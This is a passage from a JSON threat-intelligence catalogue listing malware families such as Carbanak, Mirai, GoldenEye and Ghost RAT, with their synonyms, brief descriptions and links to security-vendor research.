"https://secrary.com/ReversingMalware/WMIGhost/",
"https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets"
]
}
},
{
"uuid": "8c246ec4-eaa5-42c0-b137-29f28cbb6832",
"value": "Carbanak",
"description": "",
"meta": {
"synonyms": [
"Anunak"
],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html",
"https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf",
"https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf"
]
}
},
{
"uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd",
"value": "MM Core",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose"
]
}
},
{
"uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0",
"value": "CryptoLuck",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/"
]
}
},
{
"uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571",
"value": "YoungLotus",
"description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n",
"meta": {
"synonyms": [
"DarkShare"
],
"type": [],
"refs": [
"https://www.youtube.com/watch?v=AUGxYhE_CUY"
]
}
},
{
"uuid": "09b555be-8bac-44b2-8741-922ee0b87880",
"value": "Satana",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cylance.com/threat-spotlight-satan-raas"
]
}
},
{
"uuid": "6201c337-1599-4ced-be9e-651a624c20be",
"value": "GhostAdmin",
"description": "",
"meta": {
"synonyms": [
"Ghost iBot"
],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/",
"https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html"
]
}
},
{
"uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed",
"value": "XBTL",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "e186384b-8001-4cdd-b170-1548deb8bf04",
"value": "SpyBanker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://news.drweb.com/show/?i=11104&lng=en",
"http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/"
]
}
},
{
"uuid": "591b2882-65ba-4629-9008-51ed3467510a",
"value": "Gaudox",
"description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html"
]
}
},
{
"uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87",
"value": "NgrBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/",
"https://research.checkpoint.com/dorkbot-an-investigation/",
"http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html"
]
}
},
{
"uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27",
"value": "ASPC",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b",
"value": "CookieBag",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "0646a6eb-1c13-4d87-878e-9431314597bf",
"value": "Snojan",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9"
]
}
},
{
"uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d",
"value": "Smominru",
"description": "",
"meta": {
"synonyms": [
"Ismo"
],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators",
"http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
]
}
},
{
"uuid": "5060756f-8385-465d-a7dd-7bf09a54da92",
"value": "Alphabet Ransomware",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/813714602466877440"
]
}
},
{
"uuid": "cd397973-8f42-4c49-8322-414ea77ec773",
"value": "Olyx",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html",
"https://news.drweb.com/show/?i=1750&lng=en&c=14"
]
}
},
{
"uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6",
"value": "Koadic",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
"https://github.com/zerosum0x0/koadic"
]
}
},
{
"uuid": "51f53823-d289-4176-af45-3fca7eda824b",
"value": "Ramdo",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88",
"value": "RedAlpha",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.recordedfuture.com/redalpha-cyber-campaigns/"
]
}
},
{
"uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6",
"value": "Shujin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.nyxbone.com/malware/chineseRansom.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/"
]
}
},
{
"uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200",
"value": "yty",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/"
]
}
},
{
"uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387",
"value": "Xbot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/",
"https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/"
]
}
},
{
"uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e",
"value": "WMImplant",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html"
]
}
},
{
"uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5",
"value": "HyperBro",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/luckymouse-hits-national-data-center/86083/"
]
}
},
{
"uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f",
"value": "Mole",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware",
"https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/"
]
}
},
{
"uuid": "e1410684-c695-4c89-ae5f-80ced136afbd",
"value": "Gh0stnet",
"description": "",
"meta": {
"synonyms": [
"Remosh"
],
"type": [],
"refs": [
"https://en.wikipedia.org/wiki/GhostNet",
"http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html"
]
}
},
{
"uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd",
"value": "Nabucur",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "a70e93a7-3578-47e1-9926-0818979ed866",
"value": "RedLeaves",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html",
"https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
"http://blog.macnica.net/blog/2017/12/post-8c22.html",
"https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves",
"https://www.jpcert.or.jp/magazine/acreport-redleaves.html"
]
}
},
{
"uuid": "d84ebd91-58f6-459f-96a1-d028a1719914",
"value": "WellMess",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html"
]
}
},
{
"uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267",
"value": "Woolger",
"description": "",
"meta": {
"synonyms": [
"WoolenLogger"
],
"type": [],
"refs": [
"http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf",
"https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf"
]
}
},
{
"uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb",
"value": "GoldenEye",
"description": "",
"meta": {
"synonyms": [
"Petya/Mischa"
],
"type": [],
"refs": [
"https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
"https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/",
"http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html"
]
}
},
{
"uuid": "80acc956-d418-42e3-bddf-078695a01289",
"value": "Dok",
"description": "",
"meta": {
"synonyms": [
"Retefe"
],
"type": [],
"refs": [
"http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/",
"https://www.govcert.admin.ch/blog/33/the-retefe-saga",
"http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same",
"https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/"
]
}
},
{
"uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2",
"value": "SynAck",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/"
]
}
},
{
"uuid": "5f9ba149-100a-46eb-a959-0645d872975b",
"value": "XPCTRA",
"description": "Incorporates code of Quasar RAT.",
"meta": {
"synonyms": [
"Expectra"
],
"type": [],
"refs": [
"https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/",
"https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis"
]
}
},
{
"uuid": "6f155c95-3090-4730-8d3b-0b246162a83a",
"value": "GetMail",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411",
"value": "NewPosThings",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/",
"https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html",
"https://asert.arbornetworks.com/lets-talk-about-newposthings/",
"http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/"
]
}
},
{
"uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a",
"value": "BKA Trojaner",
"description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.",
"meta": {
"synonyms": [
"bwin3_bka"
],
"type": [],
"refs": [
"https://www.evild3ad.com/405/bka-trojaner-ransomware/"
]
}
},
{
"uuid": "a0899fec-161d-4ba8-9594-8b5620c21705",
"value": "Prilex",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.kaspersky.com/blog/chip-n-pin-cloning/21502",
"https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/"
]
}
},
{
"uuid": "fbed27da-551d-4793-ba7e-128256326909",
"value": "BravoNC",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group"
]
}
},
{
"uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9",
"value": "Jigsaw",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d",
"value": "Neutrino POS",
"description": "",
"meta": {
"synonyms": [
"Jimmy"
],
"type": [],
"refs": [
"https://securelist.com/neutrino-modification-for-pos-terminals/78839/",
"https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/"
]
}
},
{
"uuid": "c57a4168-cd09-4611-a665-bbcede80f42b",
"value": "Monero Miner",
"description": "",
"meta": {
"synonyms": [
"CoinMiner"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/"
]
}
},
{
"uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48",
"value": "Godzilla Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346"
]
}
},
{
"uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b",
"value": "Sakula RAT",
"description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.",
"meta": {
"synonyms": [
"Sakurel"
],
"type": [],
"refs": [
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1",
"https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99",
"https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula",
"https://www.secureworks.com/research/sakula-malware-family"
]
}
},
{
"uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f",
"value": "Unidentified 033",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7",
"value": "WSO",
"description": "",
"meta": {
"synonyms": [
"Webshell by Orb"
],
"type": [],
"refs": [
"https://github.com/wso-shell",
"https://securelist.com/energetic-bear-crouching-yeti/85345/"
]
}
},
{
"uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9",
"value": "Bahamut",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/",
"https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/"
]
}
},
{
"uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1",
"value": "Freenki Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/",
"http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html"
]
}
},
{
"uuid": "f7674d06-450a-4150-9180-afef94cce53c",
"value": "KokoKrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/struppigel/status/812726545173401600"
]
}
},
{
"uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28",
"value": "Olympic Destroyer",
"description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2018/02/olympic-destroyer.html",
"https://www.lastline.com/labsblog/olympic-destroyer-south-korea/",
"https://securelist.com/the-devils-in-the-rich-header/84348/",
"https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/",
"https://securelist.com/olympic-destroyer-is-still-alive/86169/",
"http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html",
"https://www.lastline.com/labsblog/attribution-from-russia-with-code/",
"https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/"
]
}
},
{
"uuid": "aea21616-061d-4177-9512-8887853394ed",
"value": "StegoLoader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer"
]
}
},
{
"uuid": "18419355-fd28-41a6-bffe-2df68a7166c4",
"value": "FlawedAmmyy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/Coldzer0/Ammyy-v3",
"https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/",
"https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat"
]
}
},
{
"uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043",
"value": "Rikamanu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets"
]
}
},
{
"uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738",
"value": "Ghost RAT",
"description": "",
"meta": {
"synonyms": [
"PCRat",
"Gh0st RAT"
],
"type": [],
"refs": [
"https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/",
"http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf",
"https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new",
"https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
"http://www.malware-traffic-analysis.net/2018/01/04/index.html",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/",
"https://blog.cylance.com/the-ghost-dragon"
]
}
},
{
"uuid": "97c1524a-c052-49d1-8770-14b513d8a830",
"value": "Unidentified 039",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c",
"value": "CabArt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e",
"value": "Pkybot",
"description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS.",
"meta": {
"synonyms": [
"Pykbot",
"TBag",
"Bublik"
],
"type": [],
"refs": [
"http://blog.kleissner.org/?p=788",
"https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution",
"http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot"
]
}
},
{
"uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd",
"value": "Kitmos",
"description": "",
"meta": {
"synonyms": [
"KitM"
],
"type": [],
"refs": [
"https://www.f-secure.com/weblog/archives/00002558.html"
]
}
},
{
"uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5",
"value": "Dimnie",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/"
]
}
},
{
"uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d",
"value": "RatabankaPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trex.re.kr/3",
"https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf"
]
}
},
{
"uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b",
"value": "Rex",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/",
"https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/"
]
}
},
{
"uuid": "0fb57d46-1c4f-49a3-80c2-05bcaa34ec1b",
"value": "BlackShades",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/",
"https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/",
"http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
"https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/"
]
}
},
{
"uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed",
"value": "MyKings Spreader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators",
"http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
]
}
},
{
"uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5",
"value": "Rapid Ransom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/malwrhunterteam/status/997748495888076800",
"https://twitter.com/malwrhunterteam/status/977275481765613569"
]
}
},
{
"uuid": "17e12216-a303-4a00-8283-d3fe92d0934c",
"value": "Mirai",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/",
"https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html",
"https://twitter.com/PhysicalDrive0/status/830070569202749440"
]
}
},
{
"uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232",
"value": "SyncCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/"
]
}
},
{
"uuid": "64f5ae85-1324-43de-ba3a-063785567be0",
"value": "WebC2-Ausov",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4",
"value": "WebC2-Cson",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada",
"value": "Gazer",
"description": "",
"meta": {
"synonyms": [
"WhiteBear"
],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/",
"https://securelist.com/introducing-whitebear/81638/",
"https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
"https://github.com/eset/malware-ioc/tree/master/turla"
]
}
},
{
"uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d",
"value": "r2r2",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/"
]
}
},
{
"uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202",
"value": "Ztorg",
"description": "",
"meta": {
"synonyms": [
"Qysly"
],
"type": [],
"refs": [
"http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2",
"https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1",
"https://securelist.com/ztorg-from-rooting-to-sms/78775/"
]
}
},
{
"uuid": "81917a93-6a70-4334-afe2-56904c1fafe9",
"value": "Bashlite",
"description": "",
"meta": {
"synonyms": [
"lizkebab",
"qbot",
"torlus",
"Gafgyt",
"gayfgt"
],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/",
"https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
"https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/"
]
}
},
{
"uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae",
"value": "smac",
"description": "",
"meta": {
"synonyms": [
"speccom"
],
"type": [],
"refs": [
"https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf"
]
}
},
{
"uuid": "0be67307-670d-4558-bcf7-1387047bca4b",
"value": "Delta(Alfa,Bravo, ...)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/"
]
}
},
{
"uuid": "f98b4092-5f32-407c-9015-2da787d70c64",
"value": "Biscuit",
"description": "",
"meta": {
"synonyms": [
"zxdosml"
],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b",
"value": "Unidentified 024 (Ransomware)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/malwrhunterteam/status/789161704106127360"
]
}
},
{
"uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd",
"value": "Venus Locker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/813690129088937984"
]
}
},
{
"uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a",
"value": "JQJSNICKER",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://marcmaiffret.com/vault7/"
]
}
},
{
"uuid": "68039fbe-2eee-4666-b809-32a011e9852a",
"value": "APT3 Keylogger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/",
"https://twitter.com/smoothimpact/status/773631684038107136",
"http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong"
]
}
},
{
"uuid": "6e0545df-8df6-4990-971c-e96c4c60d561",
"value": "Charger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.checkpoint.com/2017/01/24/charger-malware/",
"http://blog.joesecurity.org/2017/01/deep-analysis-of-android-ransom-charger.html"
]
}
},
{
"uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6",
"value": "Unidentified APK 001",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/illegalFawn/status/826775250583035904"
]
}
},
{
"uuid": "5ee77368-5e09-4016-ae73-82b99e830832",
"value": "Polyglot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/"
]
}
},
{
"uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5",
"value": "Ebury",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/",
"https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/",
"https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/",
"https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy",
"https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf"
]
}
},
{
"uuid": "ff4254e5-f301-4804-9a0f-e010af56576c",
"value": "DeputyDog",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
]
}
},
{
"uuid": "257da597-7e6d-4405-9b10-b4206bb013ca",
"value": "EHDevel",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/"
]
}
},
{
"uuid": "c359c74e-4155-4e66-a344-b56947f75119",
"value": "RCS",
"description": "",
"meta": {
"synonyms": [
"Remote Control System",
"Crisis"
],
"type": [],
"refs": [
"https://www.f-secure.com/documents/996508/1030745/callisto-group",
"https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/"
]
}
},
{
"uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d",
"value": "CryptoShuffler",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/"
]
}
},
{
"uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618",
"value": "Red Alert",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JaromirHorejsi/status/816237293073797121"
]
}
},
{
"uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7",
"value": "Opachki",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://forum.malekal.com/viewtopic.php?t=21806",
"https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519",
"http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html",
